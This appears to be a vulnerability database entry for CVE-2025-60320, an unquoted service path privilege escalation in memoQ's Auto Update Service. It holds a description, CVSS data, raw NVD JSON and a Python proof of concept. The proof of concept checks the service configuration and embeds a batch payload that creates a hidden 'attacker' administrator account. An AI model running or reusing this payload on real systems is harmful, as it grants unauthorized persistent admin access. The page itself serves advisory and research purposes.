Security Vulnerability Report
中文
CVE-2025-60320 CVSS 6.7 MEDIUM

CVE-2025-60320

Published: 2025-10-29 20:15:37
Last Modified: 2026-04-15 00:35:42

Description

memoQ 10.1.13.ef1b2b52aae and earlier contains an unquoted service path vulnerability in the memoQ Auto Update Service (memoQauhlp101). The affected service is installed with a path containing spaces and without surrounding quotes. This misconfiguration allows local users to escalate privileges to SYSTEM by placing a malicious executable at C:\Program.exe.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

memoQ 10.1.13.ef1b2b52aae及更早版本
memoQ Auto Update Service (memoQauhlp101) 所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60320 PoC - Unquoted Service Path Privilege Escalation # Target: memoQ Auto Update Service (memoQauhlp101) # Affected Path: C:\Program Files\memoQ\memoQauhlp101.exe import os import shutil import subprocess def check_vulnerable_service(): """Check if the memoQ Auto Update Service exists and is vulnerable""" try: # Check service configuration result = subprocess.run( ['sc', 'qc', 'memoQauhlp101'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: print('[+] memoQ Auto Update Service found') # Extract the path for line in result.stdout.split('\n'): if 'BINARY_PATH' in line: print(f'[+] Service path: {line.strip()}') return True return False except Exception as e: print(f'[-] Error checking service: {e}') return False def create_malicious_executable(): """Create a malicious executable that will be placed at C:\Program.exe""" # This would be a reverse shell or other malicious payload # For demonstration purposes, this creates a simple batch script malicious_code = '''@echo off net user attacker P@ssw0rd123 /add net localgroup administrators attacker /add echo [+] Privilege escalation successful > C:\\temp\\pwned.txt ''' # In real attack, this would be compiled as Program.exe # For PoC, we demonstrate the concept print('[+] Malicious executable would be created') return True def exploit(): """Exploit the unquoted service path vulnerability""" print('[*] Starting CVE-2025-60320 exploitation...') # Step 1: Check if vulnerable if not check_vulnerable_service(): print('[-] Target service not found or not vulnerable') return False # Step 2: Create malicious executable create_malicious_executable() # Step 3: Place malicious executable at C:\Program.exe # Note: Requires admin privileges to write to C:\ # But if user can write here, they already have elevated privileges # The actual attack would be during installation or via other vectors print('[+] Place malicious executable at C:\\Program.exe') print('[+] Wait for service restart or trigger via memoQ update') print('[+] Malicious code will execute with SYSTEM privileges') return True if __name__ == '__main__': exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60320", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:36.670", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "memoQ 10.1.13.ef1b2b52aae and earlier contains an unquoted service path vulnerability in the memoQ Auto Update Service (memoQauhlp101). The affected service is installed with a path containing spaces and without surrounding quotes. This misconfiguration allows local users to escalate privileges to SYSTEM by placing a malicious executable at C:\\Program.exe."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://docs.memoq.com/helpcenter/", "source": "[email protected]"}, {"url": "https://github.com/joseraeiro/security-advisories/blob/e0b1095de8b3162fb0d9de9a688317a12fdd9be8/CVE-2025-60320.md", "source": "[email protected]"}, {"url": "https://github.com/joseraeiro/security-advisories/blob/e0b1095de8b3162fb0d9de9a688317a12fdd9be8/CVE-2025-60320.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}